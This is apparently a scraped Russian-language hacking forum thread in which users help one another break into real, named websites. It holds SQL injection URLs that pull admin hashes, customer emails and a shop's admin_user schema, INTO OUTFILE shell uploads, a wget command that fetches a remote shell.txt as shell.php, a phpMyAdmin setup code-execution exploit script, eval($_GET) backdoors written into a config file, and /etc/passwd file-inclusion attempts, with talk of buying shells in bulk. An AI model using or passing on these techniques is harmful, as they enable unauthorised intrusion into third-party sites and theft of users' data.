у меня есть доступ к определённой базе sql, но на сервере есть ещё базы, могу ли я каким-нибудь образом получить к ним доступ? (знаю названия таблиц и колонок)


унаёшь названия других баз:


Code:
select schema_name from information_schema.schemata

далее в запросах указываешь в какой базе находится таблица:


Code:
select column_name from schema_name.table_name

d1v said:
далее в запросах указываешь в какой базе находится таблица:

Code:
select column_name from schema_name.table_name



WTF???


Code:
select schema_name from information_schema.tables where table_name = 'blablabla'

mailbrush said:
WTF???

Code:
select schema_name from information_schema.tables where table_name = 'blablabla'





select column_name from schema_name.table_name


я думаю понятно что это не сам запрос, а конструкция. и что здесь не аргументы, а названия.


select schema_name from information_schema.tables where table_name = 'blablabla'


а вот что это такое мне не понятно

Ребята, подскажите PLZ .... есть сайт с SQL inject. .... таблицы нашёл ..... поля в нужных таблицах тож нашёл ..... но при попытке вытащить нужную инфу из таблицы вылетает такого рода ошибка - "Table '*******.members' doesn't exist" ..... Как я понял таблица находится в др базе ..... если в запросе укзываю блаблабла from localhost.members , то вылетает такая ошибка - "SELECT command denied to user '*******'@'localhost' for table 'members'" ..... как выйти из положения ? если выход есть ..... заранее спасибо !

Не хватает прав для выполнения запроса.

d1v said:
а вот что это такое мне не понятно


Узнаешь в какой базе находится таблица.

Shell"]
[Gold]Shell said:
Не хватает прав для выполнения запроса.


лол что?

1. выполняй "union select database()";

2. потом "union select concat_ws(0x3a,username,password) from REZULTAT_PERVOGO_ZAPROSA.members limit 0,1";

3. Profit!

Фараон said:
лол что?
1. выполняй "union select database()";
2. потом "union select concat_ws(0x3a,username,password) from REZULTAT_PERVOGO_ZAPROSA.members limit 0,1";
3. Profit!


database() - результат DB.

Результат одинков .... " Table 'DB.members' doesn't exist " ..

и когда просто members и DB.members .....

mega_667 said:
database() - результат DB.
Результат одинков .... " Table 'DB.members' doesn't exist " ..
и когда просто members и DB.members .....


ни, давай ссылягу

Фараон said:
ни, давай ссылягу


Всё ребят спасибо .... разобрался с помощью SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA нашёл список баз .... последняя покатила .....

mega_667 said:
Всё ребят спасибо .... разобрался с помощью SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA нашёл список баз .... последняя покатила .....


можно было проще:

SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA where table_name='members'

Фараон said:
можно было проще:
SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA where table_name='members'


с каких пор в таблице schemata содержатся названия таблиц?


Code:
select table_schema form information_schema.tables where table_name='name'

mailbrush said:
Узнаешь в какой базе находится таблица.


это был тонкий намёк на твою ошибку. смотри внимательнее.

Есть скрипт например:

site.ru/trololo/a.php

Могу выполнять команды через него. Например:

site.ru/trololo/a.php?cmd=ls -la

Выводит лист этой диры.

Так вот. Как залить шелл в диру корневую?

Прав на заливку файла в папку /trololo/ нету.

Ups said:
Есть скрипт например:
site.ru/trololo/a.php
Могу выполнять команды через него. Например:
site.ru/trololo/a.php?cmd=ls -la
Выводит лист этой диры.
Так вот. Как залить шелл в диру корневую?
Прав на заливку файла в папку /trololo/ нету.




Code:
cd ..;wget -O shell.php http://remote/shell.txt;ls -la

Здравствуйте, меня вот интересует такой вопрос, вот к примеру вы нашли sql инъекцию подобрали количество колонок - одним словом можете выполнять произвольные запросы, а что вы дальше делаете залить shell через sql инъекцию это наверное 0.5% из 100 так как не будет прав на это, ну украдете хеш админа и будете клянчить на форуме "расшифруйте пожалуйста мне хеш" или брутить будете его пол года, это все что можно выжать их sql инъекции ?

maxfax said:
Здравствуйте, меня вот интересует такой вопрос, вот к примеру вы нашли sql инъекцию подобрали количество колонок - одним словом можете выполнять произвольные запросы, а что вы дальше делаете залить shell через sql инъекцию это наверное 0.5% из 100 так как не будет прав на это, ну украдете хеш админа и будете клянчить на форуме "расшифруйте пожалуйста мне хеш" или брутить будете его пол года, это все что можно выжать их sql инъекции ?


можно сдампить базу на стопицот мульонов акков и юзать её.

а насчёт хеша, так в большинстве случаев он удачно брутиться или его вообще нет, т.к. пассы в plaintext.

maxfax said:
Здравствуйте, меня вот интересует такой вопрос, вот к примеру вы нашли sql инъекцию подобрали количество колонок - одним словом можете выполнять произвольные запросы, а что вы дальше делаете залить shell через sql инъекцию это наверное 0.5% из 100 так как не будет прав на это, ну украдете хеш админа и будете клянчить на форуме "расшифруйте пожалуйста мне хеш" или брутить будете его пол года, это все что можно выжать их sql инъекции ?


1.XSS в SQL-инъекции - В парить админу, получить доступ в админку и залить шелл.

2. Знакомые Хэш-крякеры, платные сервисы взлома хэшей.

3. Если инъекция в UPDATE, INSERT... - Можно подменить данные в СуБДД

4. Поискать другие уязвимости - если их использовать вместе, можно получить наилучший результат.

5. Ну и конечно DoS ещё никто не отменял + с помощью инъекции можно узнать не только логины и хаш, а другие очень полезные данные.

Спасибо,за быстрые ответы, с вашего позволения еще один вопрос изложу:

Один раз мне нужно было купить несколько трафистых shell-ов я обратился к одному человеку по рекомендации он мне говорит какой нужен траф и в какой зоне shell-ы нужны, я говорю траф 20к +- 5к зона de, он говорит могу за 5 дней достать shell-ов нулевок на каждом будет трафа 10-15 чел-сутки но вообщем будет траф 20к.

Сделка так и не состоялась по моей вене!

Меня собственно интересует такие вопросы:

1) как люди добывают такое количество shell-лов

2) это супер-пупер гениально умные,космические хакеры

3) может это развод

maxfax said:
Меня собственно интересует такие вопросы:
1) как люди добывают такое количество shell-лов
2) это супер-пупер гениально умные,космические хакеры
3) может это развод


находится бага (или берётся в паблике) на каком-нибудь популярном (или не популярном) движке, с помощью которой можно залить шелл. далее по доркам парсится выдача гугла на наличие сайтов на данном движке.

Ребятки помогите со сплоитом под пхпмуадмин:


*/
//Настройки
//отправляем http-данные
//$method = POST|GET, $url = http://site.com/path, $data = foo1=bar1&foo2=bar2, referer, cookie, useragent
function send_data($method, $url, $data = '', $referer_string = '', $cookie_string = '', $ua_string = '')
{
$return = '';
$feof_count = 0;
$parsed_url = parse_url($url);
$site = $parsed_url['host'];
$path = $parsed_url['path'];
$query = $parsed_url['query'];
($method == 'GET' && !empty($data)) ? $path .= '?'.$data : '';
($method == 'POST' && !empty($query)) ? $path .= '?'.$query : '';
$fp = fsockopen($site, 80, $errno, $errstr, 30);
($method == 'POST') ? $out = "POST $path HTTP/1.1\r\n" : $out = "GET $path HTTP/1.1\r\n";
$out .= "Host: $site\r\n";
$out .= "Content-type: application/x-www-form-urlencoded\r\n";
$out .= "Connection: Close\r\n";
$out .= "User-Agent: $ua_string\r\n";
$out .= "Referer: $referer_string\r\n";
$out .= "Cookie: $cookie_string\r\n";
($method == 'POST') ? $out .= "Content-Length: ".strlen($data)."\r\n\r\n" : $out .= "\r\n";
($method == 'POST') ? fwrite($fp, $out.$data) : fwrite($fp, $out);
while (!feof($fp))
{
if($feof_count >=200)
break;
$return .= fread($fp, 4800);
++$feof_count;
}
fclose($fp);
return $return;
}
$token_page = send_data('GET',$pma_setup_url,'',$pma_setup_url,' ','Opera');
preg_match('@name="token" value="([a-f0-9]{32})"@is',$token_page,$token_array);
$token = $token_array[1];
preg_match_all('@Set-Cookie: ([^\r\n;]+)@is',$token_page,$cookie_array);
$cookie_array = $cookie_array[1];
$cookie_array = implode("; ",$cookie_array);
print send_data('POST',$pma_setup_url,'action=lay_naviga tion&eoltype=unix&token='.$token.'&configuration='.urlencode('a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:'.strlen($ftp_code).':"'.$ftp_code.'";}}'),$pma_setup_url,$cookie_array,'Opera');
?>


А именно вообще не понятна вот эта строка:


//$method = POST|GET, $url = http://site.com/path, $data = foo1=bar1&foo2=bar2, referer, cookie, useragent

plaeer said:
А именно вообще не понятна вот эта строка:


эта строка закоментирована, она не играет роли сплойт рабочий.

Cybersteger said:
эта строка закоментирована, она не играет роли сплойт рабочий.


Закоментиовал, настроил сплоит, получил:

HTTP/1.1 401 Authorization Required Date: Sat, 16 Jul 2011 19:28:19 GMT Server: Apache WWW-Authenticate: Basic realm="phpMyAdmin Setup" Vary: Accept-Encoding Content-Length: 401 Connection: close Content-Type: text/html; charset=iso-8859-1

Authorization Required

This server could not verify that you are authorized to access the document requested. Either you supplied the wrong credentials (e.g., bad password), or your browser doesn't understand how to supply the credentials required.

Дыра закрыта?

plaeer said:
Закоментиовал, настроил сплоит, получил:
HTTP/1.1 401 Authorization Required Date: Sat, 16 Jul 2011 19:28:19 GMT Server: Apache WWW-Authenticate: Basic realm="phpMyAdmin Setup" Vary: Accept-Encoding Content-Length: 401 Connection: close Content-Type: text/html; charset=iso-8859-1
Authorization Required
This server could not verify that you are authorized to access the document requested. Either you supplied the wrong credentials (e.g., bad password), or your browser doesn't understand how to supply the credentials required.
Дыра закрыта?


просто базовая авторизация стоит на папку пма и/или setup

Подскажите как правильно заливать шелл через sql-inj.


Code:
Warning: mktime() expects parameter 6 to be long, string given in /web/sites/_j/_u/_b/jubilee-centre.org/public/www/apps/documents/classes.php on line 45

поля 6 и 9

_http://www.jubilee-centre.org/document.php?id=16-999.9+union+select+1,2,3,4,5,'',7,8,9+from+informa tion_schema.tables+into+outfile+'/web/sites/_j/_u/_b/jubilee-centre.org/public/www/s.php'--+1--

не знаю как с правами на запись, это какой-то хостинг, нету таблици user, ну ее не выводит точно)

и опять 25, я что-то не так мб делаю?


Code:
http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,2,3,4,5,6,7--+
http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,'',3,4,5,6,7+INTO+OUTFILE '/home/virtwww/w_miroboew-kaz-ru_37979ae4/http/1.php'--+

Помогите плиз обойти WAF

http://www.shungitclub.ru/category_page.php?cat=21&sub=union+select+1,2,+from+mysql.user--

l.e.a.d.e.r said:
Подскажите как правильно заливать шелл через sql-inj.

Code:
Warning: mktime() expects parameter 6 to be long, string given in /web/sites/_j/_u/_b/jubilee-centre.org/public/www/apps/documents/classes.php on line 45

поля 6 и 9
_http://www.jubilee-centre.org/document.php?id=16-999.9+union+select+1,2,3,4,5,'',7,8,9+from+informa tion_schema.tables+into+outfile+'/web/sites/_j/_u/_b/jubilee-centre.org/public/www/s.php'--+1--
не знаю как с правами на запись, это какой-то хостинг, нету таблици user, ну ее не выводит точно)
и опять 25, я что-то не так мб делаю?

Code:
http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,2,3,4,5,6,7--+
http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,'',3,4,5,6,7+INTO+OUTFILE '/home/virtwww/w_miroboew-kaz-ru_37979ae4/http/1.php'--+



1. Для записи шелла можно использовать не выводимые на страницу поля.

2. File_priv у учётной записи всё равно нет.

запрещены следующие функции php


escapeshellarg,escapeshellcmd,exec,passthru,proc_c lose,proc_get_status,proc_open,proc_nice,proc_term inate,shell_exec,system,ini_restore,popen,dl


Нужно запустить свою прогу (сплоит из под веба). подскажите плиз функции другии которые это могут сделать

Nightmarе said:
echo `ls -la`;
Можно не благодарить


это алиас shell_exec, а он disabled - так что не прокатит.

Помогите пожалуйста с инъекцией

http://www.easyhandwriting.com/catalog/product_info.php/products_id/12' or 1 group by concat((select customers_email_address from customers limit 0,1),floor(rand(0)*2)) having min(0) or 1 -- 1

Flashmx said:
Помогите пожалуйста с инъекцией
http://www.easyhandwriting.com/catalog/product_info.php/products_id/12' or 1 group by concat((select customers_email_address from customers limit 0,1),floor(rand(0)*2)) having min(0) or 1 -- 1


эм... а из каких соображений там инъекция?

Подкиньте префиксы от таблиц.

Vostok said:
Подкиньте префиксы от таблиц.


Стандартные префиксы разные в каждой CMS.

Для DLE - dle_

Joomla - jos_

WordPress - wp_

И т. д.

Seravin said:
эм... а из каких соображений там инъекция?


http://www.easyhandwriting.com/catalog/product_info.php/products_id/12' or 1 group by concat((select customers_email_address from customers limit 0,1),floor(rand(0)*2)) having min(0) or 1 -- 1

1064 - You have an error in your SQL syntax

http://www.easyhandwriting.com/catalog/product_info.php/products_id/12' or 1 group by concat(user(),floor(rand(0)*2)) having min(0) or 1 -- 1

1062 - Duplicate entry 'easyhw@localhost1' for key 1

Flashmx said:
http://www.easyhandwriting.com/catalog/product_info.php/products_id/12' or 1 group by concat((select customers_email_address from customers limit 0,1),floor(rand(0)*2)) having min(0) or 1 -- 1
1064 - You have an error in your SQL syntax
http://www.easyhandwriting.com/catalog/product_info.php/products_id/12' or 1 group by concat(user(),floor(rand(0)*2)) having min(0) or 1 -- 1
1062 - Duplicate entry 'easyhw@localhost1' for key 1


Третья ветка. Надо читать мануалы


Seravin said:
эм... а из каких соображений там инъекция?


Прокрути страницу вниз

Hi guys, I need help for hacking a site. Well first I sorry for that I'm writing on english (i will use and google translator for russian, but not sure if will be understandable). So I'm not good, well let's be honest, I'm noob in this (hacking, sql hacking etc). But after hours of trying I found a vuln (not sure), but I think is vuln.


SQL Error
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' or description_en like '%77'%' or name like '%77'%') ORDER BY visits,name asc' at line 1


Well is that a vuln ? And If it, can you help me with creating a sql injections ?

Now I will try to translate it to russian, and really sorry about that. i'm from Bulgaria and I should understand your language, but unfortunately I don't. And I think if I write it to bulgarian you wont understand it, so...

Translate from google translator:

Привет, ребята, мне нужна помощь для взлома сайта. Ну сначала я извиняюсь за это я пишу на английском языке (я буду использовать и Google Translator для России, но не уверен, если будет понятно). Так что я не очень хорошо, ну давайте будем честными, я нуб в этом (взлом, взлом SQL и т.д.). но после нескольких часов пытался я нашел vuln (не уверен), но я думаю, vuln.


SQL Error
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' or description_en like '%77'%' or name like '%77'%') ORDER BY visits,name asc' at line 1


Ну, что vuln? И если это, можете ли вы помочь мне в создании SQL-инъекций?

Теперь я постараюсь перевести его на русский, и действительно сожалею об этом. Я из Болгарии и я понимаю ваш язык, но к сожалению я не делаю. И я думаю, если я напишу его на болгарский вам не понять, так что ...

beBoss said:
But after hours of trying I found a vuln (not sure), but I think is vuln.


PM me link - i will try to help you

Hey I succeeded. Thanks for your time, and sorry again for that i'm writing in english.

edit: I have a question: how to use "update" in sql and is it possible ?

This is sql injection with select:


Code:
+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(sc hema_name),12 from information_schema.schemata--+-

how to update any table?

beBoss said:
Hey I succeeded. Thanks for your time, and sorry again for that i'm writing in english.
edit: I have a question: how to use "update" in sql and is it possible ?
This is sql injection with select:

Code:
+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(sc hema_name),12 from information_schema.schemata--+-

how to update any table?


it's impossible


alexvrn said:
Если тут уязвимости

Code:
http://www.qatcom.com/yellowpages/view/-66854%27
http://www.qatcom.com/listings/search?searchtype=both&what=%3Cscript%3Ealert%28+%27hi!%27%29%3C%2Fscript %3E
http://www.qatcom.com/listings/googlesearch?gwhat=%3Cscript%3Ealert%28+%27hi!%27% 29%3C%2Fscript%3E

Кто хочет помочь с сайтом за $ пишите в личку


http://www.qatcom.com/yellowpages/view/-66854%27 - нету скули

Melfis said:
it's impossible


So in my case, I can only read info... Well I can get admins hash passwords, but I can't login with them. Only can login with member and vip acc, but they are simple acc. There is something in mods and admins acc, may be cookie or something that I don;t have and when change my cookies with admin cookies it's logout me.... What can I do ? Is there chance to upload shell or to know what is different with acc, or any way to change someting ? :S

к index.php подключается include('includes/header.php');

строки из header.php


PHP:
" />

[/COLOR]" />[/COLOR]

значения $hc_cfg6 и $hc_cfg5; берутся из таблицы в файле config.php


PHP:
$hc_cfg5="12345";

$hc_cfg6="123";

через админку в файл config.phpудается прописать eval($_GET[e]);

результат


PHP:


но ?e=phpinfo(); выводит пустую страницу.

(если прописать system($_GET['e']); весь сайт накрывается ошибкой

Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /home/******/public_html/******/******/config.php on line 9

если прописать то в index.php выглядит так


PHP:
" />[/COLOR]

Подскажите пожалуйста где я ошибся? Или что делаю не так?

Sloneny said:
к index.php подключается
include('includes/header.php');
строки из
header.php

PHP:
" />

[/COLOR]" />[/COLOR]

значения
$hc_cfg6
и
$hc_cfg5;
берутся из таблицы в файле
config.php

PHP:
$hc_cfg5="12345";

$hc_cfg6="123";

через админку в файл
config.php
удается прописать
eval($_GET[e]);
результат

PHP:


но
?e=phpinfo();
выводит пустую страницу.
(если прописать system($_GET['e']); весь сайт накрывается ошибкой
Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /home/******/public_html/******/******/config.php on line 9
если прописать то в index.php выглядит так

PHP:
" />[/COLOR]

Подскажите пожалуйста где я ошибся? Или что делаю не так?


ты сначало убедись что пхп работает как надо, пропеши команду


echo "123";


если там где вставил , будет вывод 123, значит робит норм, встовляй тогда где тебе нужно вот этот код:


if (isset($_REQUEST['e'])) eval(stripslashes($_REQUEST['e']));


и вызываешь еко так "?e=phpinfo();"

Sloneny

Тебе нужно выйти за кавычки, иначе получается, что переменная $hc_cfg6 имеет тип string и содержит строку eval($_GET[e]); соответственно код выполняться не будет

Вписываешь что то вроде


PHP:
";eval($_GET[e]);"



в итоге получаешь выполнение кода


PHP:
$hc_cfg6="";eval($_GET[e]);"";



?e=phpinfo(); выведет phpinfo

winstrool said:
ты сначало убедись что пхп работает как надо, пропеши команду
если там где вставил , будет вывод 123, значит робит норм, встовляй тогда где тебе нужно вот этот код:
и вызываешь еко так "?e=phpinfo();"


Если админка фильтрует кавычки, то ты ничто не сделаешь, это банальная XSS. Если же нет, нужно просто выйти за переменную и вставить выполняемый код, как показал h00lyshit!(Если фильтруется двоеточие, то можно вставить код в саму переменную - ".код.").

Но при этом лучше использовать не GET и POST, а куки или HTTP заголовки. Так же возможно, что на стороне сервера запрещено выполнение этих функций.

При этом можно использовать что то типа $a($b) или вставлять нужный код напрямую.

echo "123"; просто в исходном становится

больше нигде не выводит

" превращает в '

$hc_cfg6 = "echo '123';";

$hc_cfg6 = " ';eval($_GET[e]);' ";

видимо придется искать другие пути

Sloneny said:
echo "123"; просто в исходном становится

больше нигде не выводит
" превращает в '
$hc_cfg6 = "echo '123';";
$hc_cfg6 = " ';eval($_GET[e]);' ";


считай, что ты можешь вывести значение любой переменной, от этого и пляши. Только вот переменные выводи так:


Code:


а не


Code:

Seravin said:
а не

Code:




А почему бы и нет? Только одинарные кавычки здесь не к чему.


Code:


И фигурные скобки, и кавычки могут экранироваться

XAMEHA said:
А почему бы и нет? Только одинарные кавычки здесь не к чему.

Code:


И фигурные скобки, и кавычки могут экранироваться


ну так круче, инфа проверена

http://seafightclub.com/index.php?page=../../../../../../../../etc/passwd%00

что можно сделать с этим? =(

в пхп не силён

swat_ said:
http://seafightclub.com/index.php?page=../../../../../../../../etc/passwd%00
что можно сделать с этим? =(
в пхп не силён


во первых можно пробовать метод Slesh а, через Webalizer

http://seafightclub.com/index.php?page=../../stats/index.html%00

во вторых там есть форум, пробуй аватарку

в третих там ПМА есть, смотри версию..

а про environ и тп забудь, пхп тут cgi программа

Konqi said:
во первых можно пробовать метод Slesh а, через Webalizer
http://seafightclub.com/index.php?page=../../stats/index.html%00
во вторых там есть форум, пробуй аватарку
в третих там ПМА есть, смотри версию..
а про environ и тп забудь, пхп тут cgi программа


1 не канает

2 тоже не работает

3 пма не бажный

swat_ said:
1 не канает
2 тоже не работает
3 пма не бажный



что значит "не канает" ?

Konqi said:
что значит "не канает" ?


в смысле не работает


От туда берем ссылку на статистику последнего месяца. А именно имя файла. ЧТото типа такого:usage_200804.html


а тут http://seafightclub.com/usage_201107.html

Not Found

The requested URL /usage_201107.html was not found on this server.

да и домашней папки нет WebAlizer а

swat_ said:
в смысле не работает
а тут http://seafightclub.com/usage_201107.html
Not Found
The requested URL /usage_201107.html was not found on this server.
да и домашней папки нет WebAlizer а


http://seafightclub.com/index.php?page=../../stats/usage_201107.html%00

папка /stats/ это и есть домашняя папка вебалайзера =\

Konqi said:
http://seafightclub.com/index.php?page=../../stats/usage_201107.html%00
папка /stats/ это и есть домашняя папка вебалайзера =\


еще есть какие нибудь варианты?

Подскажите каким софтом пользоватся чтобы находить всяческие бэкапы, changelogs, и другие полезные файлы на сайте ?

expupkin said:
Подскажите каким софтом пользоватся чтобы находить всяческие бэкапы, changelogs, и другие полезные файлы на сайте ?


ArxScanSite

swat_ said:
еще есть какие нибудь варианты?


Там есть phpmyadmin, и все условия для работы этого сплоита:

http://snipper.ru/view/103/phpmyadmin-33102-3431-session-serializer-arbitrary-php-code-execution-exploit/

Я перепроверил

Seravin said:
ну так круче, инфа проверена


Ну тогда уж стоит сказать, что можно выполнять код без вставки огораживающих кавычек.


PHP:




Уязвимости такого типа встречаются нередко.

http://mail.pnz.ru/face/action.php?action=aff_mail&mail=7&verbose=0&lang=../../face/index это пхп инъекция? если да, то че с ней сделать можно?)

Есть php инъекция c mq=off, Но там врублен open_basedir.

Можно ли с применением новых техник типа

data:,

php://stdin

- php://stdout

- php://stderr

- php://output

- php://input

и т.п. сделать читалку, чтобы читать исходники а не инклудить

Sc0rpi0n said:
Есть php инъекция c mq=off, Но там врублен open_basedir.
Можно ли с применением новых техник типа
data:,
php://stdin
- php://stdout
- php://stderr
- php://output
- php://input
и т.п. сделать читалку, чтобы читать исходники а не инклудить


Через php://input выполнить код, который и будет читать файлы. Однако легче будет залить шелл.

/thread232773.html (https://antichat.live/threads/232773/)

Так же не забудь о загрузке аватаров и т. п.

Приведите кто-нибудь пример. Каким образом с помощью пхп юзать скули через пост.

plaeer said:
Приведите кто-нибудь пример. Каким образом с помощью пхп юзать скули через пост.


/showpost.php?p=2580704&postcount=16410

Вот к примеру скуль

http://www.riviera-crimea.com/detail.php?id=425

Как пошагово ее раскрутить до такого вида раскручивать ручками

http://www.riviera-crimea.com/detail.php?id=-425'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,co ncat_ws(0x3a,user(),version(),database()),15,16+--+

Вопрос еще такой почему если мы убираем или ковычку или знак минуса то скуль невыводит результат. От чего это зависит?

heks said:
Вот к примеру скуль
http://www.riviera-crimea.com/detail.php?id=425
Как пошагово ее раскрутить до такого вида раскручивать ручками
http://www.riviera-crimea.com/detail.php?id=-425'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,co ncat_ws(0x3a,user(),version(),database()),15,16+--+
Вопрос еще такой почему если мы убираем или ковычку или знак минуса то скуль невыводит результат. От чего это зависит?


а я думал ты хакир %)

/thread217895-sql+faq.html

Мне бы расписать почему при

http://www.riviera-crimea.com/detail.php?id=-425'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,co ncat_ws(0x3a,user(),version(),database()),15,16+--+ данные выводятся

http://www.riviera-crimea.com/detail.php?id=425+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,co ncat_ws(0x3a,user(),version(),database()),15,16+--+ (убираем минусили ковычку)данные не выводятся

как узнать когда писать именно ковычку, минус и ковычку а когда просто ковычку

Всем привет! А как узнать у определенного сайта на каком фаерволе он сидит?

contreil said:
Всем привет! А как узнать у определенного сайта на каком фаерволе он сидит?


Идиотский вопрос такой)))) Спроси кто сервер админит.

contreil said:
Всем привет! А как узнать у определенного сайта на каком фаерволе он сидит?


если ты имеешь ввиду WAF, то смотреть коды возвращаемых ошибок, куки; либо задетектить стандартные правила, характерные для конкретного WAF'a. Если же ты говоришь о том, что непосредственно защищает сам сервер, то порутать его и посмотреть что на нём запущенно.


тогда как количество солбцов подобрать
с помощью order by


статью прочитать.

heks said:
Идиотский вопрос такой)))) Спроси кто сервер админит.


И на этом спасибо!

heks said:
Мне бы расписать почему при
http://www.riviera-crimea.com/detail.php?id=-425'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,co ncat_ws(0x3a,user(),version(),database()),15,16+--+
данные выводятся
http://www.riviera-crimea.com/detail.php?id=425+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,co ncat_ws(0x3a,user(),version(),database()),15,16+--+ (убираем минусили ковычку)
данные не выводятся
как узнать когда писать именно ковычку, минус и ковычку а когда просто ковычку


Ы, кавычку нужно писать, когда переменная имеет тип string. Чтобы выйти из значения переменной и дописать свой SQL запрос. А когда переменная типа integer - кавычка ни в коем случае не нужна! И еще нужно помнить, что когда переменная типа string мы всегда должны в конце ставить комментарий ( -- ), чтобы убрать лишнюю кавычку, которая осталась.

heks said:
Мне бы расписать почему при
http://www.riviera-crimea.com/detail.php?id=-425'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,co ncat_ws(0x3a,user(),version(),database()),15,16+--+
данные выводятся
http://www.riviera-crimea.com/detail.php?id=425+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,co ncat_ws(0x3a,user(),version(),database()),15,16+--+ (убираем минусили ковычку)
данные не выводятся
как узнать когда писать именно ковычку, минус и ковычку а когда просто ковычку


ну в статьях как бы всё расписано(даже если не написано и ты не можешь понять, то наверно надо изучать не с этого)

1. Ковычка используется при запросах вида

"SELECT * FROM table WHERE param='".$_GET['param']."'"

ковычкой мы закрываем предыдущую ковычку.

Проверить просто:

http://www.riviera-crimea.com/detail.php?id=421+and+1=1 - отображает

http://www.riviera-crimea.com/detail.php?id=421+and+1=2 - отображает

значит мы не влияем на запрос, т. к. мы должны были получить пустой результат 421+and+1=2 (true and false = false)

"SELECT * FROM table WHERE param='421 and 1=2'"

2. С кавычкой

http://www.riviera-crimea.com/detail.php?id=421'+and+1=1--+ - отображает

http://www.riviera-crimea.com/detail.php?id=421'+and+1=2--+ - не отображает

значит запрос составлен верно

"SELECT * FROM table WHERE param='421' and 1=2--+'"

3. -421 это то вместо чего я использую 421 and 1=2(что как и -421 возвращает пустой запрос и можно вписать свой через union select)

может кто помочь или нет?


Code:
http://www.maykoplat.ru/index.php?id=1' AND 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48 #

не могу даже название бд узнать

Faaax said:
может кто помочь или нет?

Code:
http://www.maykoplat.ru/index.php?id=1' AND 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48 #

не могу даже название бд узнать


параметры(те что отсылаются при нажатии кнопки "оплата") для поста на корень сайта


Code:
action=pay&id=213123'+and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+'&email=a%40a.ru&submit_button=%CE%CF%CB%C0%D2%C0

юзается Error-based SQL-Injection, вместо version() подставлять (select 1) или (select group_concat(table_name) from information_schema.tables), ну и так далее

Faaax said:
может кто помочь или нет?

Code:
http://www.maykoplat.ru/index.php?id=1' AND 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48 #

не могу даже название бд узнать


В чем собственно проблема? Вывод в исходнике:


Code:
www.maykoplat.ru/index.php?id=1'and(1=0)union+select(1),2,(select(@ x)from(select(@x:=0x00),(select(0)from(information _schema.columns)where(table_schema!=0x696e666f726d 6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x ,"\r\n",table_schema,0x2e,table_name,0x3a,column_name)))) x),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8,39,40,41,42,43,44,45,46,47,48--+'1



Code:
vsemayki_ru.admin_stat:id
vsemayki_ru.admin_stat:data
vsemayki_ru.admin_stat:name
vsemayki_ru.admin_user:ID
vsemayki_ru.admin_user:LOGIN
vsemayki_ru.admin_user:PASSWORD
vsemayki_ru.admin_user:NAME
vsemayki_ru.admin_user:EMAIL
vsemayki_ru.admin_user:ACTIVE
vsemayki_ru.admin_user:DATE_LAST
vsemayki_ru.admin_user:ISADMIN
vsemayki_ru.admin_user:IP
vsemayki_ru.admin_user:stage2
vsemayki_ru.admin_user:stage3
vsemayki_ru.admin_user:stage4
vsemayki_ru.admin_user:stage5
vsemayki_ru.admin_user:stage6
vsemayki_ru.admin_user:stage7
vsemayki_ru.admin_user:stage8
vsemayki_ru.admin_user:stage9
vsemayki_ru.admin_user:stage10
vsemayki_ru.admin_user:stage11
vsemayki_ru.admin_user:stage12
vsemayki_ru.admin_user:stage13
vsemayki_ru.admin_user:stage14
vsemayki_ru.admin_user:stage15
vsemayki_ru.admin_user:stage16
vsemayki_ru.admin_user:stage17
vsemayki_ru.admin_user:stage18
vsemayki_ru.admin_user:sklad
vsemayki_ru.admin_user:stage19
vsemayki_ru.admin_user:stages20
vsemayki_ru.admin_user:stages21
vsemayki_ru.admin_user:stages22
vsemayki_ru.admin_user:department
vsemayki_ru.admin_user:phone
vsemayki_ru.admin_user_login:admin_login_id
vsemayki_ru.admin_user_login:parent
vsemayki_ru.admin_user_login:datetime
vsemayki_ru.admin_user_login:ip
vsemayki_ru.admin_user_login:type
vsemayki_ru.admin_user_login:succes
vsemayki_ru.admin_user_parts:ID
vsemayki_ru.admin_user_parts:admin_user
vsemayki_ru.admin_user_parts:module
vsemayki_ru.admin_user_parts:module_key
vsemayki_ru.admin_user_parts:iswrite

http://www.gagauzia.md/search.php

sql в поиске, реально раскрутить?

547 said:
покажи как крутить такую скуль...




Code:
